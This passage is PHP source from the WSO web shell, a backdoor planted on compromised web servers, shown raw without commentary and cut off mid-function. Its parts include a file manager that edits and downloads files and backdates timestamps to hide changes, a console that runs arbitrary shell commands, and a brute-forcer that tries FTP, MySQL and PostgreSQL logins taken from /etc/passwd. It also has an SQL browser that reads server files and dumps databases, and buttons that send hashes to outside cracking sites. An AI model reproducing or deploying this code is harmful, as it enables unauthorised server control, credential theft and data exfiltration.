        if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
            $files[] = array_merge($tmp, array('type' => 'file'));
        } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
        } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && $dirContent[$i] != ".") {
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
        }
    }
    $GLOBALS['sort'] = $sort;
    function wsoCmp($a, $b)
    {
        if ($GLOBALS['sort'][0] != 'size') {
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
        } else {
            return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
        }
    }
    usort($files, "wsoCmp");
    usort($dirs, "wsoCmp");
    $files = array_merge($dirs, $files);
    $l = 0;
    foreach ($files as $f) {
        echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
        $l = $l ? 0 : 1;
    }
    echo "<tr><td colspan=7>\n\t<input type=hidden name=a value='FilesMan'>\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if (class_exists('ZipArchive')) {
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    }
    echo "<option value='tar'>Compress (tar.gz)</option>";
    if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) {
        echo "<option value='paste'>Paste / Compress</option>";
    }
    echo "</select>&nbsp;";
    if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) {
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'>&nbsp;";
    }
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
    wsoFooter();
}
function actionStringTools()
{
    if (!function_exists('hex2bin')) {
        function hex2bin($p)
        {
            return decbin(hexdec($p));
        }
    }
    if (!function_exists('binhex')) {
        function binhex($p)
        {
            return dechex(bindec($p));
        }
    }
    if (!function_exists('hex2ascii')) {
        function hex2ascii($p)
        {
            $r = '';
            for ($i = 0; $i < strLen($p); $i += 2) {
                $r .= chr(hexdec($p[$i] . $p[$i + 1]));
            }
            return $r;
        }
    }
    if (!function_exists('ascii2hex')) {
        function ascii2hex($p)
        {
            $r = '';
            for ($i = 0; $i < strlen($p); ++$i) {
                $r .= sprintf('%02X', ord($p[$i]));
            }
            return strtoupper($r);
        }
    }
    if (!function_exists('full_urlencode')) {
        function full_urlencode($p)
        {
            $r = '';
            for ($i = 0; $i < strlen($p); ++$i) {
                $r .= '%' . dechex(ord($p[$i]));
            }
            return strtoupper($r);
        }
    }
    $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen');
    if (isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
        ob_start();
        if (in_array($_POST['p1'], $stringTools)) {
            echo $_POST['p1']($_POST['p2']);
        }
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
    }
    wsoHeader();
    echo "<h1>String conversions</h1><div class=content>";
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach ($stringTools as $k => $v) {
        echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
    }
    echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
    if (!empty($_POST['p1'])) {
        if (in_array($_POST['p1'], $stringTools)) {
            echo htmlspecialchars($_POST['p1']($_POST['p2']));
        }
    }
    echo "</pre></div><br><h1>Search files:</h1><div class=content>\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\n\t\t\t</table></form>";
    function wsoRecursiveGlob($path)
    {
        if (substr($path, -1) != '/') {
            $path .= '/';
        }
        $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
        if (is_array($paths) && @count($paths)) {
            foreach ($paths as $item) {
                if (@is_dir($item)) {
                    if ($path != $item) {
                        wsoRecursiveGlob($item);
                    }
                } else {
                    if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) {
                        echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
                    }
                }
            }
        }
    }
    if (@$_POST['p3']) {
        wsoRecursiveGlob($_POST['c']);
    }
    echo "</div><br><h1>Search for hash:</h1><div class=content>\n\t\t<form method='post' target='_blank' name='hf'>\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\n            <input type='hidden' name='act' value='find'/>\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\n            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\n\t\t</form></div>";
    wsoFooter();
}
function actionFilesTools()
{
    if (isset($_POST['p1'])) {
        $_POST['p1'] = urldecode($_POST['p1']);
    }
    if (@$_POST['p2'] == 'download') {
        if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: " . $type);
            } else {
                header("Content-Type: application/octet-stream");
            }
            $fp = @fopen($_POST['p1'], "r");
            if ($fp) {
                while (!@feof($fp)) {
                    echo @fread($fp, 1024);
                }
                fclose($fp);
            }
        }
        exit;
    }
    if (@$_POST['p2'] == 'mkfile') {
        if (!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if ($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    wsoHeader();
    echo "<h1>File tools</h1><div class=content>";
    if (!file_exists(@$_POST['p1'])) {
        echo "File not exists";
        wsoFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    if (!$uid) {
        $uid['name'] = @fileowner($_POST['p1']);
        $gid['name'] = @filegroup($_POST['p1']);
    } else {
        $gid = @posix_getgrgid(@filegroup($_POST['p1']));
    }
    echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
    echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
    if (empty($_POST['p2'])) {
        $_POST['p2'] = 'view';
    }
    if (is_file($_POST['p1'])) {
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
    } else {
        $m = array('Chmod', 'Rename', 'Touch');
    }
    foreach ($m as $v) {
        echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
    }
    echo "<br><br>";
    switch ($_POST['p2']) {
        case 'view':
            echo "<pre class=ml1>";
            $fp = @fopen($_POST['p1'], 'r');
            if ($fp) {
                while (!@feof($fp)) {
                    echo htmlspecialchars(@fread($fp, 1024));
                }
                @fclose($fp);
            }
            echo "</pre>";
            break;
        case 'highlight':
            if (@is_readable($_POST['p1'])) {
                echo "<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">";
                $code = @highlight_file($_POST['p1'], true);
                echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
            }
            break;
        case 'chmod':
            if (!empty($_POST['p3'])) {
                $perms = 0;
                for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) {
                    $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
                }
                if (!@chmod($_POST['p1'], $perms)) {
                    echo "Can't set permissions!<br><script>document.mf.p3.value=\"\";</script>";
                }
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
            break;
        case 'edit':
            if (!is_writable($_POST['p1'])) {
                echo "File isn't writeable";
                break;
            }
            if (!empty($_POST['p3'])) {
                $time = @filemtime($_POST['p1']);
                $_POST['p3'] = substr($_POST['p3'], 1);
                $fp = @fopen($_POST['p1'], "w");
                if ($fp) {
                    @fwrite($fp, $_POST['p3']);
                    @fclose($fp);
                    echo "Saved!<br><script>p3_=\"\";</script>";
                    @touch($_POST['p1'], $time, $time);
                }
            }
            echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if ($fp) {
                while (!@feof($fp)) {
                    echo htmlspecialchars(@fread($fp, 1024));
                }
                @fclose($fp);
            }
            echo "</textarea><input type=submit value=\">>\"></form>";
            break;
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>', '', '');
            $len = strlen($c);
            for ($i = 0; $i < $len; ++$i) {
                $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
                switch (ord($c[$i])) {
                    case 0:
                        $h[2] .= ' ';
                        break;
                    case 9:
                        $h[2] .= ' ';
                        break;
                    case 10:
                        $h[2] .= ' ';
                        break;
                    case 13:
                        $h[2] .= ' ';
                        break;
                    default:
                        $h[2] .= $c[$i];
                        break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i + 1 < $len) {
                        $h[0] .= sprintf('%08X', $i + 1) . '<br>';
                    }
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
            }
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
            break;
        case 'rename':
            if (!empty($_POST['p3'])) {
                if (!@rename($_POST['p1'], $_POST['p3'])) {
                    echo "Can't rename!<br>";
                } else {
                    die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
                }
            }
            echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
            break;
        case 'touch':
            if (!empty($_POST['p3'])) {
                $time = strtotime($_POST['p3']);
                if ($time) {
                    if (!touch($_POST['p1'], $time, $time)) {
                        echo "Fail!";
                    } else {
                        echo "Touched!";
                    }
                } else {
                    echo "Bad time format!";
                }
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
            break;
    }
    echo "</div>";
    wsoFooter();
}
function actionConsole()
{
    if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif (!empty($_POST['p1'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
    }
    if (isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
        ob_start();
        echo "d.cf.cmd.value='';\n";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']), "\n\r\t\\'\x00"));
        if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
            if (@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "c_='" . $GLOBALS['cwd'] . "';";
            }
        }
        echo "d.cf.output.value+='" . $temp . "';";
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
    }
    wsoHeader();
    echo "<script>\nif(window.Event) window.captureEvents(Event.KEYDOWN);\nvar cmds = new Array('');\nvar cur = 0;\nfunction kp(e) {\n\tvar n = (window.Event) ? e.which : e.keyCode;\n\tif(n == 38) {\n\t\tcur--;\n\t\tif(cur>=0)\n\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\telse\n\t\t\tcur++;\n\t} else if(n == 40) {\n\t\tcur++;\n\t\tif(cur < cmds.length)\n\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\telse\n\t\t\tcur--;\n\t}\n}\nfunction add(cmd) {\n\tcmds.pop();\n\tcmds.push(cmd);\n\tcmds.push('');\n\tcur = cmds.length-1;\n}\n</script>";
    echo "<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;\"><select name=alias>";
    foreach ($GLOBALS['aliases'] as $n => $v) {
        if ($v == '') {
            echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
            continue;
        }
        echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
    }
    echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    if (!empty($_POST['p1'])) {
        echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']));
    }
    echo "</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>";
    echo "</form></div><script>d.cf.cmd.focus();</script>";
    wsoFooter();
}
function actionLogout()
{
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
    die('bye!');
}
function actionSelfRemove()
{
    if ($_POST['p1'] == 'yes') {
        if (@unlink("/var/www/html/wso.php5.682744b3438d8f2379a2f12f6af82fbe.bin")) {
            die('Shell has been removed');
        } else {
            echo "unlink error!";
        }
    }
    if ($_POST['p1'] != 'yes') {
        wsoHeader();
    }
    echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,'yes')\">Yes</a></div>";
    wsoFooter();
}
function actionBruteforce()
{
    wsoHeader();
    if (isset($_POST['proto'])) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
        if ($_POST['proto'] == 'ftp') {
            function wsoBruteForce($ip, $port, $login, $pass)
            {
                $fp = @ftp_connect($ip, $port ? $port : 21);
                if (!$fp) {
                    return false;
                }
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif ($_POST['proto'] == 'mysql') {
            function wsoBruteForce($ip, $port, $login, $pass)
            {
                $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif ($_POST['proto'] == 'pgsql') {
            function wsoBruteForce($ip, $port, $login, $pass)
            {
                $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
                $res = @pg_connect($str);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if ($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if (is_array($temp)) {
                foreach ($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
                        $success++;
                        echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
                    }
                    if (@$_POST['reverse']) {
                        $tmp = "";
                        for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
                            $tmp .= $line[0][$i];
                        }
                        ++$attempts;
                        if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
                            $success++;
                            echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
                        }
                    }
                }
            }
        } elseif ($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if (is_array($temp)) {
                foreach ($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
                        $success++;
                        echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
                    }
                }
            }
        }
        echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
    }
    echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td><td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo "</div><br>";
    wsoFooter();
}
function actionSql()
{
    class DbClass
    {
        var $type;
        var $link;
        var $res;
        function DbClass($type)
        {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname)
        {
            switch ($this->type) {
                case 'mysql':
                    if ($this->link = @mysql_connect($host, $user, $pass, true)) {
                        return true;
                    }
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if (!$host[1]) {
                        $host[1] = 5432;
                    }
                    if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
                        return true;
                    }
                    break;
            }
            return false;
        }
        function selectdb($db)
        {
            switch ($this->type) {
                case 'mysql':
                    if (@mysql_select_db($db)) {
                        return true;
                    }
                    break;
            }
            return false;
        }
        function query($str)
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                case 'pgsql':
                    return $this->res = @pg_query($this->link, $str);
            }
            return false;
        }
        function fetch()
        {
            $res = func_num_args() ? func_get_arg(0) : $this->res;
            switch ($this->type) {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                case 'pgsql':
                    return @pg_fetch_assoc($res);
            }
            return false;
        }
        function listDbs()
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->query("SHOW databases");
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
            }
            return false;
        }
        function listTables()
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
            }
            return false;
        }
        function error()
        {
            switch ($this->type) {
                case 'mysql':
                    return @mysql_error();
                case 'pgsql':
                    return @pg_last_error();
            }
            return false;
        }
        function setCharset($str)
        {
            switch ($this->type) {
                case 'mysql':
                    if (function_exists('mysql_set_charset')) {
                        return @mysql_set_charset($str, $this->link);
                    } else {
                        $this->query('SET CHARSET ' . $str);
                    }
                    break;
                case 'pgsql':
                    return @pg_set_client_encoding($this->link, $str);
            }
            return false;
        }
        function loadFile($str)
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
                case 'pgsql':
                    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
                    $r = array();
                    while ($i = $this->fetch()) {
                        $r[] = $i['file'];
                    }
                    $this->query('drop table wso2');
                    return array('file' => implode("\n", $r));
            }
            return false;
        }
        function dump($table, $fp = false)
        {
            switch ($this->type) {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
                    $create = mysql_fetch_array($res);
                    $sql = $create[1] . ";\n";
                    if ($fp) {
                        fwrite($fp, $sql);
                    } else {
                        echo $sql;
                    }
                    $this->query('SELECT * FROM `' . $table . '`');
                    $i = 0;
                    $head = true;
                    while ($item = $this->fetch()) {
                        $sql = '';
                        if ($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }
                        $columns = array();
                        foreach ($item as $k => $v) {
                            if ($v === null) {
                                $item[$k] = "NULL";
                            } elseif (is_int($v)) {
                                $item[$k] = $v;
                            } else {
                                $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
                            }
                            $columns[] = "`" . $k . "`";
                        }
                        if ($head) {
                            $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
                            $head = false;
                        } else {
                            $sql .= "\n\t,(" . implode(", ", $item) . ')';
                        }
                        if ($fp) {
                            fwrite($fp, $sql);
                        } else {
                            echo $sql;
                        }
                        $i++;
                    }
                    if (!$head) {
                        if ($fp) {
                            fwrite($fp, ";\n\n");
                        } else {
                            echo ";\n\n";
                        }
                    }
                    break;
                case 'pgsql':
                    $this->query('SELECT * FROM ' . $table);
                    while ($item = $this->fetch()) {
                        $columns = array();
                        foreach ($item as $k => $v) {
                            $item[$k] = "'" . addslashes($v) . "'";
                            $columns[] = $k;
                        }
                        $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
                        if ($fp) {
                            fwrite($fp, $sql);
                        } else {
                            echo $sql;
                        }
                    }
                    break;
            }
            return false;
        }
    }
    $db = new DbClass($_POST['type']);
    if (@$_POST['p2'] == 'download') {
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        switch ($_POST['charset']) {
            case "Windows-1251":
                $db->setCharset('cp1251');
                break;
            case "UTF-8":
                $db->setCharset('utf8');
                break;
            case "KOI8-R":
                $db->setCharset('koi8r');
                break;
            case "KOI8-U":
                $db->setCharset('koi8u');
                break;
            case "cp866":
                $db->setCharset('cp866');
                break;
        }
        if (empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach ($_POST['tbl'] as $v) {
                $db->dump($v);
            }
            exit;
        } elseif ($fp = @fopen($_POST['file'], 'w')) {
            foreach ($_POST['tbl'] as $v) {
                $db->dump($v, $fp);
            }
            fclose($fp);
            unset($_POST['p2']);
        } else {
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
        }
    }
    wsoHeader();
    echo "\n<h1>Sql browser</h1><div class=content>\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n<td><select name='type'><option value='mysql' ";
    if (@$_POST['type'] == 'mysql') {
        echo "selected";
    }
    echo ">MySql</option><option value='pgsql' ";
    if (@$_POST['type'] == 'pgsql') {
        echo "selected";
    }
    echo ">PostgreSql</option></select></td>\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
    $tmp = "<input type=text name=sql_base value=''>";
    if (isset($_POST['sql_host'])) {
        if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch ($_POST['charset']) {
                case "Windows-1251":
                    $db->setCharset('cp1251');
                    break;
